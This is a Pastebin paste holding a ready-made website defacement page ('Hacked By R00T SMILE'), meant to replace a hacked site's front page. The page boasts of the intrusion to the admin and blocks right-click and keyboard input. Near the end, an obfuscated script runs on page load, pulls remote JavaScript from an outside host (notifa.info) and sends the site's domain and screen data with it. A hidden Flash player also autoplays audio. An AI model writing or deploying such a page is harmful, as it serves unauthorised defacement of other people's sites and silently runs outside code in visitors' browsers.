Advertisement
imamilyasa

Untitled

May 23rd, 2019
129
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.59 KB | None | 0 0
  1.  
  2.  
  3.  
  4.  
  5. <!DOCTYPE html>
  6. <html>
  7.  
  8. <head>
  9. <title>Hacked By R00T SMILE</title>
  10. <meta charset="UTF-8">
  11. <meta name="Author" content="R0sX_010"/>
  12. <meta name="copyright" content="R0sX_010"/>
  13. <meta name="description" content="Website Pawned by R0sX_010"/>
  14. <link href='http://fonts.googleapis.com/css?family=Iceland:400,700' rel='stylesheet' type='text/css'>
  15. <link href='http://fonts.googleapis.com/css?family=Iceland:400,700' rel='stylesheet' type='text/css'>
  16. <meta property="og:image" content="">
  17. <style type="text/css">
  18. body {
  19. overflow:hidden;
  20. background-image:url('http://www.drodd.com/images16/black-picture8.jpg');
  21. background-color: #000000;
  22. background-repeat:no-repeat;
  23. background-size: 100% ;
  24. background-position:top center;
  25. margin: 0px;
  26. cursor:none;
  27. font-family: Iceland, sans-serif;
  28. }
  29. a{
  30. text-decoration: none;
  31. }
  32. h1{
  33. font-family: Iceland, sans-serif;
  34. font-size:90px;
  35. color:#fff;
  36. margin:0px 0px 0px;
  37.  
  38. }
  39. h2{
  40. font-family: Iceland, sans-serif;
  41. font-size:40px;
  42. color:#000;
  43. margin: 0px;
  44. text-shadow: 0 0 3px #fff;
  45.  
  46. }
  47. p{
  48. color:#fff;
  49. font-size:25px;
  50. margin: 0px;
  51. text-shadow: 0 0 3px #ff0099;
  52.  
  53. }
  54. .fot{
  55. font-family: Iceland, sans-serif;
  56. font-size:14px;
  57. color:#fff;
  58. margin: 0px;
  59. text-shadow: 0 0 3px #000, 0px 0px 5px #000;
  60. }
  61. h1{
  62. color:#000;
  63. text-shadow: 0 0 5px #fff;
  64. }
  65. .greets{
  66. font-family: Arial, sans-serif;
  67. line-height: 24px;
  68. font-size: 11px;
  69. width: 50%;
  70. background: #000;
  71. opacity: 0.9;
  72. text-transform: uppercase;
  73. z-index: 9999;
  74. border-radius:10px;
  75. -moz-box-shadow: 1px 0px 2px #000;
  76. -webkit-box-shadow: 1px 0px 2px #000;
  77. box-shadow: 1px 0px 2px #000;
  78. }
  79. </style>
  80. </head>
  81. <div id="I301_html">
  82.  
  83. <script type="text/javascript" src="http://code.jquery.com/jquery.min.js"></script>
  84.  
  85. <script type="text/javascript">setTimeout("$('#loading').fadeOut(5000);", 10000); </script>
  86.  
  87. <style type="text/css">#loading{position:fixed;top:0;left:0;padding-top:0px;background-color:#000;width:100%;height:100%;color:black;z-index:9000;overflow:hidden;}</style>
  88.  
  89. <div id="loading">
  90. <body onload="document.f.p.focus()" topmargin="0" leftmargin="0" bgcolor="#000000" marginheight="0" marginwidth="0">
  91. <table border="0" cellpadding="2" cellspacing="0" width="100%">
  92. <tbody><tr>
  93.  
  94.  
  95. </tr>
  96.  
  97. <tr>
  98.  
  99.  
  100.  
  101. </tr>
  102. </tbody></table>
  103. <font id="ResponseData" color="#ff99cc">
  104. <pre><script type="text/javascript">
  105. TypingText = function(element, interval, cursor, finishedCallback) {
  106. if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
  107. this.running = true; // Never run.
  108. return;
  109. }
  110. this.element = element;
  111. this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
  112. this.interval = (typeof interval == "undefined" ? 100 : interval);
  113. this.origText = this.element.innerHTML;
  114. this.unparsedOrigText = this.origText;
  115. this.cursor = (cursor ? cursor : "");
  116. this.currentText = "";
  117. this.currentChar =0;
  118. this.element.typingText = this;
  119. if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
  120. TypingText.all.push(this);
  121. this.running = false;
  122. this.inTag = false;
  123. this.tagBuffer = "";
  124. this.inHTMLEntity = false;
  125. this.HTMLEntityBuffer = "";
  126. }
  127. TypingText.all = new Array();
  128. TypingText.currentIndex = 0;
  129. TypingText.runAll = function() {
  130. for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
  131. }
  132. TypingText.prototype.run = function() {
  133. if(this.running) return;
  134. if(typeof this.origText == "undefined") {
  135. setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval); // We haven't finished loading yet. Have patience.
  136. return;
  137. }
  138. if(this.currentText == "") this.element.innerHTML = "";
  139. // this.origText = this.origText.replace(/<([^<])*>/, ""); // Strip HTML from text.
  140. if(this.currentChar < this.origText.length) {
  141. if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
  142. this.tagBuffer = "<";
  143. this.inTag = true;
  144. this.currentChar++;
  145. this.run();
  146. return;
  147. } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
  148. this.tagBuffer += ">";
  149. this.inTag = false;
  150. this.currentText += this.tagBuffer;
  151. this.currentChar++;
  152. this.run();
  153. return;
  154. } else if(this.inTag) {
  155. this.tagBuffer += this.origText.charAt(this.currentChar);
  156. this.currentChar++;
  157. this.run();
  158. return;
  159. } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
  160. this.HTMLEntityBuffer = "&";
  161. this.inHTMLEntity = true;
  162. this.currentChar++;
  163. this.run();
  164. return;
  165. } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
  166. this.HTMLEntityBuffer += ";";
  167. this.inHTMLEntity = false;
  168. this.currentText += this.HTMLEntityBuffer;
  169. this.currentChar++;
  170. this.run();
  171. return;
  172. } else if(this.inHTMLEntity) {
  173. this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
  174. this.currentChar++;
  175. this.run();
  176. return;
  177. } else {
  178. this.currentText += this.origText.charAt(this.currentChar);
  179. }
  180. this.element.innerHTML = this.currentText;
  181. this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
  182. this.currentChar++;
  183. setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
  184. } else {
  185. this.currentText = "";
  186. this.currentChar = 0;
  187. this.running = false;
  188. this.finishedCallback();
  189. }
  190. }
  191. </script>
  192. <script>
  193. function disableselect(e){return false}
  194.  
  195. function reEnable(){return true}
  196.  
  197. //if IE4+
  198. document.onselectstart=new Function ("return false")
  199.  
  200. //if NS6
  201. if (window.sidebar){
  202. document.onmousedown=disableselect
  203. document.onclick=reEnable
  204. }
  205. </script>
  206. <script>
  207. var message="";
  208. function clickIE()
  209.  
  210. {if (document.all)
  211. {(message);return false;}}
  212.  
  213. function clickNS(e) {
  214. if
  215. (document.layers||(document.getElementById&&!document.all))
  216. {
  217. if (e.which==2||e.which==3) {(message);return false;}}}
  218. if (document.layers)
  219. {document.captureEvents(Event.MOUSEDOWN);document. onmousedown=clickNS;}
  220. else
  221. {document.onmouseup=clickNS;document.oncontextmenu =clickIE;}
  222.  
  223. document.oncontextmenu=new Function("return false")
  224. </script>
  225.  
  226. <table style=" background-repeat: no-repeat;" align="right" border="0" width="100%" >
  227.  
  228. <br>
  229.  
  230. <tbody><tr>
  231. <td valign="top"><p id="hack" >
  232.  
  233. <br>
  234. <br>
  235. <font style="color:#ffffff;text-shadow:#FF0099 0px 0px 10px"> &nbsp;&nbsp;&nbsp;&nbsp;<b>[+] R0sX_010 Is Now Into Your System... </font> <br>
  236. <font style="color:#ffffff;text-shadow:#FF0099 0px 0px 10px"> &nbsp;&nbsp;&nbsp;&nbsp;<b>[+] Dear admin </font><br>
  237. <font style="color:#ffffff;text-shadow:#FF0099 0px 0px 10px"> &nbsp;&nbsp;&nbsp;&nbsp;<b>[+] Your Security Is So SLow </font><br>
  238. <font style="color:#ffffff;text-shadow:#FF0099 0px 0px 10px"> &nbsp;&nbsp;&nbsp;&nbsp;<b>[+] <font style="color:red;text-shadow:#000 0px 0px 3px">R00T</font><font style="color:white;text-shadow:#000 0px 0px 3px"> SMILE</font> [+] </font> <br>
  239. <font color="White">
  240.  
  241.  
  242. </p></tr>
  243. </tbody></table> </div>
  244. <br>
  245.  
  246. <script type="text/javascript">
  247. new TypingText(document.getElementById("hack"), 50, function(i) { var ar = new Array("_",""); return " " + ar[i.length % ar.length]; });
  248. TypingText.runAll();
  249.  
  250. </script>
  251.  
  252. <style>
  253.  
  254. td
  255.  
  256. {
  257.  
  258. background-color: #000000;
  259.  
  260. font-family: Courier New;
  261.  
  262. font-size:20px;
  263.  
  264. color:#000000;
  265.  
  266. border-color: #000000;
  267.  
  268. border-width:1pt;
  269.  
  270. border-style:solid;
  271.  
  272. border-collapse:collapse;
  273.  
  274. padding:0pt 3pt;
  275.  
  276. vertical-align:top;
  277.  
  278. }
  279.  
  280. table
  281.  
  282. {
  283.  
  284. border-color: #88aace;
  285.  
  286. border-width:0pt 1pt;
  287.  
  288. border-style:dash;
  289.  
  290. }
  291.  
  292. A:Link, A:Visited
  293.  
  294. {
  295.  
  296. color: #88aace;
  297.  
  298. }
  299.  
  300. A.no:Link, A.no:Visited
  301.  
  302. {
  303.  
  304. color: #88aace;
  305.  
  306. text-decoration: none;
  307.  
  308. }
  309.  
  310. A:Hover, A:Visited:Hover , A.no:Hover, A.no:Visited:Hover
  311.  
  312. {
  313.  
  314. color: #88aace;
  315.  
  316. background-color:#2e2e2e;
  317.  
  318. text-decoration:
  319.  
  320. overline underline;
  321.  
  322. }
  323.  
  324. .style1
  325.  
  326. {
  327.  
  328. color: #88aace
  329.  
  330. }
  331.  
  332. .style2
  333.  
  334. {
  335.  
  336. color: 1f1f1f
  337.  
  338. }
  339.  
  340. body
  341.  
  342. {
  343.  
  344. color:white;
  345.  
  346. background-position:right;
  347.  
  348. background-attachment:fixed;
  349.  
  350. </div>
  351.  
  352. }
  353.  
  354. </style>
  355.  
  356.  
  357. </div>
  358.  
  359. </div>
  360. <body oncontextmenu="return false" onkeydown="return false">
  361. <center>
  362. <h2 class="glow"><font style="color:green;text-shadow:#000 0px 0px 3px"></font><font style="color:red;text-shadow:#000 0px 0px 3px">R00T</font><font style="color:white;text-shadow:#000 0px 0px 3px"> SMILE</font>
  363. <font style="color:green;text-shadow:#000 0px 0px 3px"></font></h2>
  364. <img src="https://1.bp.blogspot.com/-r9z7gno_Kmc/WKzuDapzzkI/AAAAAAAAAfs/iEco8UwEuiMxvovwEGuLcZkO0AN8mfxBQCLcB/s1600/logo%2B5.jpg"width="350"height="350">
  365. <h2 class="glow2" ><font style="color:yellow;text-shadow:#000 0px 0px 3px">.::Pawned By::.</font><br> <span style="color:orange;font-family:Iceland;text-shadow:white 0px 0px 10px">./</span><span style="color:#ffffff;font-family:Iceland;text-shadow:#FF0099 0px 0px 10px">R00T SMILE</span></b></h2>
  366. <p><b><font style="color:green;text-shadow:#000 0px 0px 3px">Sorry Admin, I Was On Your System. By </font><span style="font-family:Iceland;color:red;text-shadow:#000 0px 0px 3px">Anonymous,</span>
  367. <font style="color:green;text-shadow:#000 0px 0px 3px">PLEASE </font><font style="color:blue;text-shadow:#000 0px 0px 3px">CHECK AND PATCH</font>
  368. <font style="color:green;text-shadow:#000 0px 0px 3px"> YOUR SECURITY !</font><br><font style="color:yellow;text-shadow:#000 0px 0px 3px">#*#*#*#</font>
  369. </p>
  370. </span>
  371. <div style="font-size:10px;color:gold;text-shadow:grey 0px 0px 3px">
  372. <span style="font-family:Iceland;font-weight:bold;color:#ffffff"><p><font style="color:green;text-shadow:#000 0px 0px 3px">~SECURITY IS JUST AN ILLUSION~</font></p></span>
  373. </div>
  374.  
  375. <div class="greets">
  376. <table align=center border="0">
  377. <tr>
  378. <td width=100% id=greetz>
  379. <marquee behavior="scroll" direction="left" scrollamount="4" scrolldelay="55" width="100%">
  380. <font size="5px" style="font-family: Iceland, sans-serif;color:white;text-shadow: 0 0 3px red, 0px 0px 5px red" >
  381. <b>-=|[R0sX_010]-[GTr-03]-[......]-[JMN]|=-</font>
  382. </marquee>
  383. </td>
  384. </table></div>
  385. <div class="fot">
  386. Copyrights &copy; R0sX_010
  387. </div>
  388. </center>
  389. <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JKzDzTsXZH2VaQk%2b4CcyitfIxY%2b9%2fUli5Yqt6HOuOmK1%2bbFLt8Azr8Z58DMVhCmokdZtG%2fJqW%2fmxLEoF1XGPPwxGg6hqO%2fPg4rTB3mXgv%2fT%2f1jIR40WmfIPwpnPudzOcagxWYVayqSjliqXrXg8FcyveSetINKUJG6X%2f0EFYETfWEpJ2Jb9T0F0IwdTfmbxjL6hTHLQkfZpQyq82QWzYraP2VDVI9fPkuW69tJ4mnCqvXYYu9sWez9%2fxOUEX4ldCvBfx2sPz%2frAS5KV9gJntc%2fZxx6a9sABAb3fR9yIdyzw4Ah7DNPhyQ1YW90E0WSdIi7XTd263pop0XOb%2fa3u%2bQZa3uvPXybYTU8mtAzCtSBaqqOGUJRLzVX%2fcvRK3oyCteHysQxt2uyeC4q4I6hRvQIV5G4i%2fCFdnb%2bh9%2bm1bwMlTXEqgumCT%2fo%2fCmHIV2xXorc3jLPpzFuPWqSQKGCS39HkjXr2%2b%2b%2fTvkWWRExVr36nVRQsIQPY%2fim%2bm%2fhILL0NjjyvTAiBs3GOsmTCJ5Wr7iX2n4NGiiIsWl1hYppsCLKp%2b6DfXT0dr4MjnOiKxpMH9Q%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
  390. <object data="http://flash-mp3-player.net/medias/player_mp3.swf" width="0" height="0" type="application/x-shockwave-flash"><param value="#ffffff" name="bgcolor"><param value="mp3=http://zizka.free.fr/_muisc/04-kanye_west-amazing_ft._young_jeezy-(HHKingz.net).mp3&amp;loop=1&amp;autoplay=1&amp;volume=125" name="FlashVars"></object>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement